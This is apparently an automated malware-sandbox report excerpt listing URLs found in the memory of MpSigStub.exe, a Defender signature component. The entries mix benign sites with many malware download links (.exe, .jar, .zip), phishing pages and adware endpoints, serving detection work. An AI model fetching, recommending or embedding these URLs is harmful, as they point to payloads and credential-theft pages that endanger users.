Source: MpSigStub.exe, 00000023.00000003.18310002934.0000015B1B40D000.00000004.00000001.sdmp String found in binary or memory: http://facebegen.com/dexport/ajax.php
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: http://faithhotelghana.com
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp String found in binary or memory: http://faneuil-lawsuit.com/xl.png
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://fantastico.globo.com/jornalismo/fant/
Source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp String found in binary or memory: http://fast-loads2.name/agreement.php
Source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp String found in binary or memory: http://fast-loads2.name/agreement.phpxN
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://fateh.aba.ae/abc.zip
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://fateh.aba.ae/xyzx.zip
Source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp String found in binary or memory: http://fbcores.info/
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://fechiizonshiteita-taihendayo.net/movie.php?id=movies_n01.wmv&cid=
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://fechiizonshiteita-taihendayo.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://feed.helperbar.com
Source: MpSigStub.exe, 00000023.00000003.18319967809.0000015B1BE5C000.00000004.00000001.sdmp String found in binary or memory: http://fei-coder.com/
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp String found in binary or memory: http://feliz2008.land.ru/iexplore.exe
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://fellatioadultfilehost.com/pc/page/set_reg.php?af_num=&cuid=
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://fen0men.info/exp/index.php
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: http://festival23234.com/flash.php?mode=1
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://fgrss.com/?referrer=c3rob3jhdeblyxn0bwfulmnvbq==
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://fhayazilim.com/wp-admin/
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp String found in binary or memory: http://file.sidetab.co.kr/dst/WallTab_
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://files.getpricefinder.com/install/ie/pricefinderpackage.zip
Source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp String found in binary or memory: http://finance.yahoo.com/
Source: MpSigStub.exe, 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp String found in binary or memory: http://finanzen-netto.de
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://find.verycd.com/folders?cat=movie&kw=%s
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://finder.strangled.net/?pubid=
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://fineartconsult.be/gallery/index.php?email=
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://firefoxstabs.com/
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp String found in binary or memory: http://firestweb.com/loja/social/1.jpg
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp String found in binary or memory: http://firestweb.com/loja/social/2.jpg
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp String found in binary or memory: http://firestweb.com/loja/social/3.jpg
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://fixdoctorsfirst.net/registry/andyfkz.png?bg=sp14
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://flash.chinaren.com/ip/ip.php
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: http://flashupd.com/mp3/in
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://florida-pawn.com?
Source: MpSigStub.exe, 00000023.00000003.18293334552.0000015B1BC8E000.00000004.00000001.sdmp String found in binary or memory: http://flow4.6299.cc/ClientAPI/flowtaskAPI.aspx
Source: MpSigStub.exe, 00000023.00000003.18286537046.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://fmforums.com/wggx991264/
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://foo.w97.cn/SoftInterFace/SearchNum.aspx
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://foo.w97.cn/data/file/kwbuf.ini
Source: MpSigStub.exe, 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp String found in binary or memory: http://foreground.me/m/
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp String found in binary or memory: http://forkasimov.hopto.org/pursue/updates.html/f
Source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp String found in binary or memory: http://forms.newlifeadmin.org
Source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: http://foundation.shanto-mariamfoundation.org/24.gif
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://foxxpriv.ru/pic1/index.php
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp String found in binary or memory: http://foxy.divarug.com:8080/yahoo.js
Source: MpSigStub.exe, 00000023.00000003.18301236868.0000015B1B97A000.00000004.00000001.sdmp String found in binary or memory: http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=10
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://frame.crazywinnings.com/scripts/protect.php?promo
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://freedomtonurse.net?
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://freeholdsurgical.net?
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://freeholdsurgical.org?
Source: MpSigStub.exe, 00000023.00000003.18350843348.0000015B1B3CA000.00000004.00000001.sdmp String found in binary or memory: http://freeimagehost.ru/ubanner.png
Source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp String found in binary or memory: http://freevideoz.info/
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://freezdec.ru/serviceupdate.exe
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://freight.eu.com/download
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://fu.o3sb.com:9999/img.jpg
Source: MpSigStub.exe, 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp String found in binary or memory: http://funsiteshere.com/
Source: MpSigStub.exe, 00000023.00000003.18325191461.0000015B1BE9F000.00000004.00000001.sdmp String found in binary or memory: http://funsiteshere.com/redir.php
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: http://futebolclubesantacruz.com.br/
Source: MpSigStub.exe, 00000023.00000003.18342870635.0000015B1AB89000.00000004.00000001.sdmp String found in binary or memory: http://g.delyemo.ru
Source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp String found in binary or memory: http://g1.globo.com/Noticias/SaoPaulo/0
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://gahtt9j6.u8f3e5jq.ru
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://gaigoixxx.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp String found in binary or memory: http://galinasergeeva.ru
Source: MpSigStub.exe, 00000023.00000003.18334190857.0000015B1A60C000.00000004.00000001.sdmp String found in binary or memory: http://galleries.payserve.com/1/31952/1
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://gallolitaadultmove.com/pc/page/set_reg.php?code=&cuid=
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://gameroominc.com/
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://games.enet.com.cn/article/SearchCategory.php?key=%s
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://garlic10.grey.ero0101.com/set_inf.php?id=ero257.wmv&cid=
Source: MpSigStub.exe, 00000023.00000003.18344667874.0000015B1B06E000.00000004.00000001.sdmp String found in binary or memory: http://gathome.com/cgi-bin/first.pl
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://gd-sirve.com/rb.txt
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://gdcbmuveqjsli57x.onion/b93cf40ee63ed066
Source: MpSigStub.exe, 00000023.00000003.18329672768.0000015B1ADDA000.00000004.00000001.sdmp String found in binary or memory: http://ge.tt/api/
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://geezybeatz.com/secured/index.html)
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://geocities.com/jobreee/main.htm
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://geocities.yahoo.com.br/youtoba03/listaaut.jpg
Source: MpSigStub.exe, 00000023.00000003.18330938423.0000015B1AA81000.00000004.00000001.sdmp String found in binary or memory: http://get.file136desktop.info/DownloadManager/Get?p=638x
Source: MpSigStub.exe, 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp String found in binary or memory: http://getfreez.net/multi-codec-pack.php
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: http://getp.jujutang.com
Source: MpSigStub.exe, 00000023.00000003.18294597236.0000015B1A5CB000.00000004.00000001.sdmp String found in binary or memory: http://getsyncer5.info/sync/?ext=bcool&pid=26&country=us
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://getvolkerdns.co.cc/priv8
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://getwebcake.com/Privacy
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: http://getyouneed.co
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: http://getyouneed.coa
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://getyouneed.com
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: http://getyouneed.com/r.php?wm=5
Source: MpSigStub.exe, 00000023.00000003.18342184671.0000015B1C358000.00000004.00000001.sdmp String found in binary or memory: http://gg.pw
Source: MpSigStub.exe, 00000023.00000003.18299634028.0000015B1AF1A000.00000004.00000001.sdmp String found in binary or memory: http://ghsinternationalconferencewithinternationalfilesecureserviceglo.ydns.eu
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://ghthf.cf/cert/
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: http://gicia.info/cd/cd.php?id=%s&ver=g
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://gidstaxi.nl/mrszheuhe/8888888.png
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://ginger90.ivory.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://girlongirllibido.info/show.php?s=c366aa9358
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://gistsdey.com/wp-content/
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://gkfaalkhnkqvgjntywc.ml/liverpool-fc-news/features/
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://globalsoftbd.com/votre_agence-lcl.php
Source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp String found in binary or memory: http://globonoticia.iitalia.com/noticia.com
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://go.%6C%61%69%6C%65%61.%69%6E%66%6F/?i=
Source: MpSigStub.exe, 00000023.00000003.18325191461.0000015B1BE9F000.00000004.00000001.sdmp String found in binary or memory: http://go.58.com/?f=
Source: MpSigStub.exe, 00000023.00000003.18342184671.0000015B1C358000.00000004.00000001.sdmp String found in binary or memory: http://go.jetswap.com/ssflang.php?it=4893473
Source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp String found in binary or memory: http://go.secureclick6.com/0534
Source: MpSigStub.exe, 00000023.00000003.18286860697.0000015B081A5000.00000004.00000001.sdmp String found in binary or memory: http://go.winantivirus.com
Source: MpSigStub.exe, 00000023.00000003.18286860697.0000015B081A5000.00000004.00000001.sdmp String found in binary or memory: http://go.winantivirus.comx
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://gogglgdoc.com/document/review/index.html)
Source: MpSigStub.exe, 00000023.00000003.18313952102.0000015B1B3A0000.00000004.00000001.sdmp String found in binary or memory: http://gogo.ru/go?x;
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://golden-toto.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: http://goo.gl/
Source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp String found in binary or memory: http://goo.gl/0ma6okopenhttp://goo.gl/0ma6okerror
Source: MpSigStub.exe, 00000023.00000003.18320270470.0000015B1B515000.00000004.00000001.sdmp String found in binary or memory: http://goo.gl/9mrcts
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://goo.gl/bw14po
Source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp String found in binary or memory: http://goo.gl/x7a4lcshowwebinpopuptaskkill-f-im
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp String found in binary or memory: http://google-adsenc.com/in.cgi?
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: http://google.com
Source: MpSigStub.exe, 00000023.00000003.18302834450.0000015B1BFE8000.00000004.00000001.sdmp String found in binary or memory: http://google.com/
Source: MpSigStub.exe, 00000023.00000003.18302834450.0000015B1BFE8000.00000004.00000001.sdmp String found in binary or memory: http://google.com/ID
Source: MpSigStub.exe, 00000023.00000003.18318994950.0000015B1A589000.00000004.00000001.sdmp String found in binary or memory: http://google.com/install.php?time=%d
Source: MpSigStub.exe, 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18316930994.0000015B1B590000.00000004.00000001.sdmp String found in binary or memory: http://google.ru/js
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://gosgd.com
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://gosgd2.com
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://gpt.alarmasystems.ru/wp-content/upgrade/obi.html
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://gpt0.ru/in.cgi
Source: MpSigStub.exe, 00000023.00000003.18306868118.0000015B1AA1D000.00000004.00000001.sdmp String found in binary or memory: http://gracefullifetime.com/yqagtiljgk/530340.png
Source: MpSigStub.exe, 00000023.00000003.18326614272.0000015B1A717000.00000004.00000001.sdmp String found in binary or memory: http://granitmdp.com/rechnung-nr-06197/
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://grape53.olive.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp String found in binary or memory: http://greenthdykegheedahatakankeadeshnaathfgh.ydns.eu/office360/regasm.exe
Source: MpSigStub.exe, 00000023.00000003.18326506118.0000015B1A705000.00000004.00000001.sdmp String found in binary or memory: http://greentreee.com/src/gate.php?a
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp String found in binary or memory: http://gridinsoft.com/check_ver.php?product=chmeditor&ver=
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://grizzli-counter.com/id120/index.php
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://gstat.bluechipstaffing.com/
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://gstat.chromaimagen.com/
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://gstat.couturefloor.com/
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://gstat.ddoborguild.com/0n1ine.exe
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://gstat.dondyablo.com/
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://gstat.echowin.com/autorizz0.exe
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://gstat.globaltcms.com/autorizz0.exe
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://gstat.hamiltoncustomhomesinc.com/
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp String found in binary or memory: http://gstat.llbntv.com/pagament1.exe
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp String found in binary or memory: http://gstat.llbntv.org/pagament1.exe
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://gstat.securitiessupportunit.com/
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://guineapig.tips/co
Source: MpSigStub.exe, 00000023.00000003.18311861284.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://gveejlsffxmfjlswjmfm.com/files/
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://gweboffice.co.uk/
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://gx3bxpo.sed.digitalmusictutorials.com
Source: MpSigStub.exe, 00000023.00000003.18334799670.0000015B1A704000.00000004.00000001.sdmp String found in binary or memory: http://gyeuiojndhbvmaoiwnnchauwo28vnj8mjmvnwhk.ydns.eu/document.doc
Source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: http://h1m2en.ddns.net/sa98as8f7/kk/1445785485
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: http://handjobheats.com/xgi-bin/q.php
Source: MpSigStub.exe, 00000023.00000003.18314518681.0000015B1B7A8000.00000004.00000001.sdmp String found in binary or memory: http://hao.360.cn
Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp String found in binary or memory: http://hao.360.cn/?src=lm&
Source: MpSigStub.exe, 00000023.00000003.18314518681.0000015B1B7A8000.00000004.00000001.sdmp String found in binary or memory: http://hao.360.cnx
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://harpa.space/kgodu.dot
Source: MpSigStub.exe, 00000023.00000003.18304719860.0000015B1B7EB000.00000004.00000001.sdmp String found in binary or memory: http://hasvideo.net
Source: MpSigStub.exe, 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp String found in binary or memory: http://hasvideo.net?t=
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://hdghdg.coom.in/showthread.php?t=72241732
Source: MpSigStub.exe, 00000023.00000003.18299634028.0000015B1AF1A000.00000004.00000001.sdmp String found in binary or memory: http://hellos.tcp4.me/standard-bank-online-relief-funds-ucount-onlinebanking.standardbank.co.za-dire
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://helpefy.com/002/777/new%20outlook/new%20outlook/
Source: MpSigStub.exe, 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp String found in binary or memory: http://helpprice.in
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://helpservice09.hol.es
Source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp String found in binary or memory: http://hem1.passagen.se/fylke/
Source: MpSigStub.exe, 00000023.00000003.18330938423.0000015B1AA81000.00000004.00000001.sdmp String found in binary or memory: http://hgastation.com
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://hi.ru/?44
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp String found in binary or memory: http://highnmightytv.com/orderss182doc.php
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: http://highnmightytv.com/wp-content/themes/data.php
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://highpay.website/css/windows.jar
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://hikangaroo5.com/images/xjs7s/gb40f_eygecpdogfzeca1xtg/ruryf1?sxps=vddxqzhm_&oof=xptbdzfnuzvdt
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://hiltrox.com
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://hit1.marinalvapn.com/silage.zip
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://hnigrp.com?
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://hniltd.com?
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://hnimanagement.com?
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://hnimgmt.com?
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://hnimgt.com?
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://ho.io/
Source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp String found in binary or memory: http://hohosearch.com/?uid=1234#red=
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://hollywood-pawn.com?
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://hollywoodnailspa.net/auth/tb/tb/index.html)
Source: MpSigStub.exe, 00000023.00000003.18281872533.0000015B1C527000.00000004.00000001.sdmp String found in binary or memory: http://hombresvalientesposadas.com/paya/reportdhlnew2.php
Source: MpSigStub.exe, 00000023.00000003.18344996372.0000015B1B0B0000.00000004.00000001.sdmp String found in binary or memory: http://hombresvalientesposadas.com/zek/reportdhlnew2.php
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp String found in binary or memory: http://home.zh-cn.cc/
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: http://hookbase.com/Index.htm
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://host87.net
Source: MpSigStub.exe, 00000023.00000003.18292431996.0000015B1BA3D000.00000004.00000001.sdmp String found in binary or memory: http://hostserver.kr
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://hostthenpost.org/uploads/
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: http://hotbar.com
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp String found in binary or memory: http://hotedeals.co.uk/ekck095032/
Source: MpSigStub.exe, 00000023.00000003.18302181106.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://houusha33.icu/jquery/jquery.php
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://hpg.se/tmp/lns.txt
Source: MpSigStub.exe, 00000023.00000003.18350843348.0000015B1B3CA000.00000004.00000001.sdmp String found in binary or memory: http://hqsextube08.com/getsoft/task.php?v=
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://html.hjsm.tom.com/?mod=book&act=anonsearch&key=%s
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://htmlcss.3322.org/sub/ray.js
